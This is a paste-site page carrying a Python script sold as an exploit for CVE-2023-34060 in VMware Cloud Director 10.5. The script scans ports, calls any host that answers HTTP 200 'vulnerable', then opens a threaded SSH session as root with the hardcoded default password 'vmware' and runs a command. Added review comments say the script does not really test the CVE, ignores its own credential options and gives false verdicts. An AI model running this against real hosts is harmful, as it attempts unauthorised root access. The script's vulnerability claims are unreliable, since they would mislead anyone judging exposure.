FlyFar

VMware Cloud Director 10.5 - Bypass Identity Verification - CVE-2023-34060

Mar 13th, 2024
Python 3.06 KB | Cybersecurity | 0 0
  1. # Exploit Title: [VMware Cloud Director | Bypass identity verification]
  2. # Google Dork: [non]
  3. # Date: [12/06/2023]
  4. # Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
  5. # Version: [10.5]
  6. # CVE : [CVE-2023-34060]
  7. import requests
  8. import paramiko
  9. import subprocess
  10. import socket
  11. import argparse
  12. import threading
  13.  
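def is_port_open(ip, port):
    """Return True if a TCP connection to ``ip``:``port`` succeeds within 1 second.

    Args:
        ip: Host name or IPv4 address to connect to.
        port: TCP port number.

    Returns:
        True when the connect call completes, False when it fails.

    A False result only means the connect attempt failed (refused, timed
    out, unreachable, name resolution error, or a port number outside
    0-65535). It does not distinguish a closed port from a filtered one,
    and a True result says nothing about which service is listening.
    """
    # The context manager closes the socket on every path, including errors.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(1)
        try:
            sock.connect((ip, port))
        except (OSError, OverflowError):
            # OSError covers refusals, timeouts and resolution failures;
            # OverflowError is what connect() raises for an out-of-range port.
            # A bare ``except:`` would also swallow KeyboardInterrupt and
            # SystemExit, so Ctrl-C could be reported as "port closed".
            return False
        return True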
  31.  
# Open a password-authenticated SSH session, run one command, print its stdout
def exploit_device(ip, port, username, password, command):
    """Log in over SSH to ``ip``:``port``, run ``command`` and print its stdout.

    Args:
        ip: Target host passed to ``SSHClient.connect``.
        port: TCP port passed to ``SSHClient.connect``.
        username: Accepted but not used by the body (see NOTE below).
        password: Accepted but not used by the body (see NOTE below).
        command: Command string passed to ``exec_command``.

    Returns:
        None. The command's stdout is printed; stderr and the exit status
        are not read.

    NOTE(review): the connect call passes the literals "root" and "vmware"
    rather than ``username`` and ``password``, so the -u/-w options of the
    script have no effect on the login that is attempted.

    NOTE(review): nothing here tests a login-restriction bypass. A
    successful run shows only that the root account accepted this password
    over SSH on this port; whether that relates to CVE-2023-34060 is not
    established by this code -- confirm against the vendor advisory.
    """
    # Create a ssh client object
    client = paramiko.SSHClient()
    # AutoAddPolicy accepts any unknown host key without verification, so the
    # identity of the remote host is never checked.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    # Password login only: agent and key-file lookup are both disabled. On the
    # server side this appears as an ordinary password-authenticated root SSH
    # session, which is what a defender would look for in the auth logs.
    client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False)
    # Execute the command; only stdout is consumed below
    stdin, stdout, stderr = client.exec_command(command)
    # Print the output (empty if the command wrote only to stderr)
    print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")
    # Close the ssh connection. Not in a finally block, so this line is not
    # reached if connect() or exec_command() raises.
    client.close()
  46.  
  47.  
# Parse the arguments from the user.
# This runs at module top level (there is no ``if __name__ == "__main__"`` guard),
# so importing the file also parses sys.argv and starts the loop below.
parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")
parser.add_argument("ip", help="The target IP address")
parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")
# NOTE(review): -u and -w are parsed and forwarded, but exploit_device() does
# not use them; it connects with the literals "root" and "vmware".
parser.add_argument("-u", "--username", default="root", help="The username for ssh")
parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")
parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")
args = parser.parse_args()
 
# Loop through the ports; the "vulnerable" verdict below is a heuristic only.
# NOTE(review): the sole criterion is an HTTP 200 answer to a plain-HTTP GET.
# Any web server that returns 200 is reported as vulnerable, and a host that
# answers with a redirect, an error or TLS-only is reported as not vulnerable.
# This is not a test for CVE-2023-34060; the printed verdicts should not be
# used as an exposure assessment. Determine exposure from the appliance's
# installed version and the vendor advisory instead.
for port in args.ports:
    # Check if the port accepts a TCP connection
    if is_port_open(args.ip, port):
        # Plain-HTTP GET with no timeout and no exception handling.
        # NOTE(review): for a non-HTTP service such as SSH on port 22 this call
        # presumably raises (or blocks), which would end the script with a
        # traceback before the remaining ports are checked -- confirm.
        response = requests.get(f"http://{args.ip}:{port}")
        if response.status_code == 200:
            # Reported as vulnerable purely because the status code was 200
            print(f"Port {port} is vulnerable to CVE-2023-34060")
            # An SSH login is then attempted against the same port that just
            # answered HTTP. The thread is never joined; an exception raised
            # inside it is reported by the threading machinery and does not
            # propagate to this loop.
            thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))
            # Start the thread
            thread.start()
        else:
            # Any status other than 200 is reported as not vulnerable
            print(f"Port {port} is not vulnerable to CVE-2023-34060")
    else:
        # The TCP connect failed (closed, filtered, or timed out after 1 second)
        print(f"Port {port} is closed")
  76.            